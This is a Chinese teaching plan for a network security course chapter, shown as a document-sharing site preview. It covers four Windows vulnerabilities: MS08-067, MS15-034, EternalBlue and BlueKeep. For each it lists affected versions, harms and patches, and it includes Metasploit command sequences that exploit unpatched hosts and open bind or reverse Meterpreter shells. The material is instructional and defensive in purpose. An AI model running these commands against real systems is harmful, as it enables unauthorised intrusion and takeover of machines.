計算機(jī)網(wǎng)絡(luò)安全技術(shù) 教案 第五章 常見的系統(tǒng)漏洞_第1頁
計算機(jī)網(wǎng)絡(luò)安全技術(shù) 教案 第五章 常見的系統(tǒng)漏洞_第2頁
計算機(jī)網(wǎng)絡(luò)安全技術(shù) 教案 第五章 常見的系統(tǒng)漏洞_第3頁
計算機(jī)網(wǎng)絡(luò)安全技術(shù) 教案 第五章 常見的系統(tǒng)漏洞_第4頁
計算機(jī)網(wǎng)絡(luò)安全技術(shù) 教案 第五章 常見的系統(tǒng)漏洞_第5頁
已閱讀5頁,還剩2頁未讀 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

常見的系統(tǒng)漏洞教學(xué)設(shè)計題目常見的系統(tǒng)漏洞授課專業(yè)學(xué)情分析了解學(xué)生的基礎(chǔ)理論知識、技能水平以及他們對系統(tǒng)漏洞的認(rèn)識程度。確定教學(xué)的具體目標(biāo),例如,學(xué)生應(yīng)該掌握哪些類型的系統(tǒng)漏洞,如何發(fā)現(xiàn)和防御這些漏洞,以及如何通過實驗來加深理解。教學(xué)目標(biāo)通過學(xué)習(xí),學(xué)生能夠識別和描述常見的系統(tǒng)漏洞類型,掌握使用各種安全工具和技術(shù)來發(fā)現(xiàn)、分析和利用系統(tǒng)漏洞的能力。過程與方法在教學(xué)過程中,應(yīng)該注重理論與實踐相結(jié)合。通過課堂講解、案例分析和實驗操作等方式,讓學(xué)生在實踐中學(xué)習(xí)和體驗網(wǎng)絡(luò)安全的重要性。情感態(tài)度與價值觀使學(xué)生認(rèn)識到系統(tǒng)漏洞對個人、組織和社會經(jīng)濟(jì)的影響,培養(yǎng)起高度的安全意識和終身學(xué)習(xí)的習(xí)慣。教學(xué)重點了解并掌握各種系統(tǒng)漏洞影響的系統(tǒng)及版本、造成的危害和補(bǔ)救措施教學(xué)難點如何對系統(tǒng)漏洞進(jìn)行補(bǔ)救教學(xué)方法采用多樣化的教學(xué)方法,如講授、討論、合作學(xué)習(xí)、案例分析等,以適應(yīng)不同學(xué)生的學(xué)習(xí)需求和偏好。同時,利用現(xiàn)代教育技術(shù)手段,如多媒體教學(xué)、網(wǎng)絡(luò)模擬等,提高教學(xué)效果。持續(xù)更新學(xué)生了解如何獲取最新的安全動態(tài)和技術(shù)更新,以保持自己的知識和技能與時俱進(jìn)。教學(xué)過程教學(xué)內(nèi)容課堂組織一、案例引入列舉身邊的例子,是學(xué)生認(rèn)識到系統(tǒng)漏洞的危害二、新課講解1.MS08_067漏洞(1)概述MS08-067漏洞的全稱是“WindowsServer服務(wù)RPC請求緩沖區(qū)溢出漏洞”,是在MSRPCoverSMB通道調(diào)用Server服務(wù)程序中的NetPathCanonicalize函數(shù)時觸發(fā)的。在遠(yuǎn)程訪問其他主機(jī)時,會調(diào)用NetpwPathCanonicalize函數(shù),對遠(yuǎn)程訪問的路徑進(jìn)行規(guī)范化,如果在NetpwPathCanonicalize函數(shù)中發(fā)生了棧緩沖區(qū)內(nèi)存錯誤,就可能被利用實施遠(yuǎn)程代碼執(zhí)行。(2)影響的系統(tǒng)及版本(1)MicrosoftWindows2000ServicePack4(2)WindowsXPServicePack2(3)WindowsXPServicePack3(4)WindowsXPProfessionalx64Edition(5)WindowsXPProfessionalx64EditionServicePack2(6)WindowsServer2003ServicePack1(7)WindowsServer2003ServicePack2(8)WindowsServer2003x64Edition(9)WindowsServer2003x64EditionServicePack2(10)WindowsServer2003SP1(11)WindowsServer2003SP2(12)WindowsVista和WindowsVistaServicePack1(13)WindowsVistax64Edition和WindowsVistax64EditionServicePack1(14)WindowsServer2008(用于32位系統(tǒng))(15)WindowsServer2008(用于基于x64的系統(tǒng))(16)WindowsServer2008(用于基于Itanium的系統(tǒng))(17)Windows7Beta(用于32位系統(tǒng))(18)Windows7Betax64Edition(19)Windows7Beta(用于基于Itanium的系統(tǒng))(3)漏洞復(fù)現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms08_067_netapi使用攻擊載荷:setpayloadgeneric/shell_bind_tcp設(shè)置攻擊機(jī)器監(jiān)聽端口:setlport4444設(shè)置攻擊目標(biāo)的IP地址:setrhosts執(zhí)行攻擊:exploit②執(zhí)行“cd..”命令2次返回到根目錄,執(zhí)行“typetest.txt”命令查看被攻擊計算機(jī)上C盤目錄下的test.txt文件的內(nèi)容。(4)漏洞造成的危害攻擊者可以利用MS08_067漏洞獲取目標(biāo)主機(jī)的最高系統(tǒng)權(quán)限。(5)修補(bǔ)措施①升級到最新的Windows操作系統(tǒng)。②安裝KB958644補(bǔ)丁。2.MS15_034漏洞(1)概述HTTP協(xié)議堆棧(HTTP.sys)中存在一個遠(yuǎn)程代碼執(zhí)行漏洞,當(dāng)HTTP.sys錯誤地解析特制HTTP請求時,會觸發(fā)該漏洞。成功利用此漏洞的攻擊者可以在系統(tǒng)賬戶的上下文中執(zhí)行任意代碼。(2)影響的系統(tǒng)及版本(1)WindowsServer2003。(2)WindowsVista。(3)WindowsServer2008。(4)Windows7。(5)WindowsServer2008R2。(6)Windows8和Windows8.1。(7)WindowsServer2012和WindowsServer2012R2。(8)WindowsRT和WindowsRT8.1。(3)漏洞復(fù)現(xiàn)(1)在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useauxiliary/scanner/http/ms15_034_http_sys_memory_dump設(shè)置攻擊目標(biāo)的IP地址:setrhosts執(zhí)行攻擊:run(2)利用MS15_034漏洞。(3)查看目標(biāo)計算機(jī)。(4)造成溢出,觸發(fā)漏洞造成藍(lán)屏(4)造成的危害①遠(yuǎn)程讀取IIS服務(wù)器的數(shù)據(jù)。②造成服務(wù)器系統(tǒng)藍(lán)屏崩潰。(5)修補(bǔ)措施對于MS15_034漏洞,微軟給的建議是安裝補(bǔ)丁KB3042553。如果操作系統(tǒng)長時間未進(jìn)行升級會顯示“此更新不適用于您的計算機(jī)”,此時需要安裝前置補(bǔ)丁KB3021910、KB2919355、KB3042553。其中,KB2919355是一組補(bǔ)丁。安裝補(bǔ)丁后,使用Range驗證,響應(yīng)為“BadRequest”,說明此攻擊無效,已經(jīng)修復(fù)漏洞。3.MS17_010漏洞(1)概述MS17-010(永恒之藍(lán)漏洞)的爆發(fā)源于WannaCry勒索病毒的誕生,該病毒是不法分子利用美國國家安全局泄露的漏洞“EternalBlue”(永恒之藍(lán))改造而成的。MS17-010漏洞通過TCP的445和139端口,利用SMBv1和NBT中的遠(yuǎn)程代碼執(zhí)行漏洞,通過惡意代碼掃描并攻擊開放445文件共享端口的Windows主機(jī)。(2)影響的系統(tǒng)及版本(1)WindowsNT。(2)Windows2000。(3)WindowsXP。(4)Windows2003。(5)WindowsVista。(6)Windows7。(7)Windows8。(8)Windows2008。(9)Windows2008R2。(10)WindowsServer2012SP0。(3)漏洞復(fù)現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms17_010_eternalblue設(shè)置攻擊目標(biāo)的IP地址:setrhosts設(shè)置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設(shè)置本機(jī)的IP地址:setlhosts設(shè)置本機(jī)的監(jiān)聽端口:setlport4444執(zhí)行攻擊:exploit②成功獲取目標(biāo)主機(jī)權(quán)限。(4)造成的危害①攻擊者可以獲取目標(biāo)主機(jī)的最高權(quán)限。②容易感染W(wǎng)annaCry勒索病毒。(5)修補(bǔ)措施不同版本的操作系統(tǒng)對應(yīng)的MS17-010補(bǔ)丁編號如下。(1)WindowsXP特別補(bǔ)丁KB4012598(2)Windows2003特別補(bǔ)丁KB4012598(3)Windows2008R2補(bǔ)丁KB4012212、KB4012215(4)Windows7補(bǔ)丁KB4012212、KB4012215(5)Windows732位補(bǔ)丁KB4012212、KB4012215(6)Windows764位補(bǔ)丁KB4012212、KB4012215(7)Windows101607補(bǔ)丁KB4013429(8)Windows10160732位補(bǔ)丁KB4013429(9)Windows10160764位補(bǔ)丁KB4013429(10)Windows2012R2補(bǔ)丁KB4012213、KB4012216(11)Windows2016補(bǔ)丁KB40134294.CVE-2019-0708漏洞(1)概述在2019年5月的補(bǔ)丁周期中,微軟在其遠(yuǎn)程桌面服務(wù)(RDS)中發(fā)布了一個遠(yuǎn)程代碼執(zhí)行錯誤補(bǔ)丁。遠(yuǎn)程未經(jīng)身份驗證的攻擊者可以通過將精心設(shè)計的RDP消息發(fā)送到目標(biāo)服務(wù)器來利用此漏洞。攻擊者成功利用此漏洞可以執(zhí)行任意代碼。(2)影響的系統(tǒng)及版本(1)WindowsXP(2)Windows7(3)WindowsServer2003(4)WindowsServer2008(5)WindowsServer2008R2(3)漏洞復(fù)現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/rdp/cve_2019_0708_bluekeep_rce設(shè)置攻擊目標(biāo)的IP地址:setrhosts68設(shè)置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設(shè)置本機(jī)的IP地址:setlhosts20設(shè)置本機(jī)的監(jiān)聽端口:setlport4444執(zhí)行攻擊:exploit②成功獲取到目標(biāo)主機(jī)權(quán)限。(4)造成的危害①攻擊者可以獲取目標(biāo)主機(jī)的最高權(quán)限。②可能造成目標(biāo)主機(jī)藍(lán)屏。(5)修補(bǔ)措施(1)微軟已發(fā)布官方補(bǔ)丁程序修復(fù)該漏洞,騰訊安全專家建議用戶使用WindowsUpdate或騰訊電腦管家、騰訊御點終端安全管理系統(tǒng)的漏洞修復(fù)功能安裝補(bǔ)丁程序。(2)用戶也可以參考微軟官方網(wǎng)站的安全更新指南下載、安裝補(bǔ)丁。(3)如果用戶仍在使用已不被微軟支持的操作系統(tǒng),包括Windows2003和WindowsXP,則解決此漏洞的最佳方法是將操作系統(tǒng)升級為最新版本的Windows操作系統(tǒng)。(4)使用Windows8和Windows10操作系統(tǒng)的用戶不受此漏洞的影響,無須擔(dān)心這個問題。(5)安裝補(bǔ)丁有困難或不使用遠(yuǎn)程桌面服務(wù)的用戶,可采取其他緩解措施。三、思政課堂教育學(xué)生認(rèn)識到系統(tǒng)漏洞的嚴(yán)重性,培養(yǎng)他們的安全意識和責(zé)任感,使他們能夠在未來的工

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論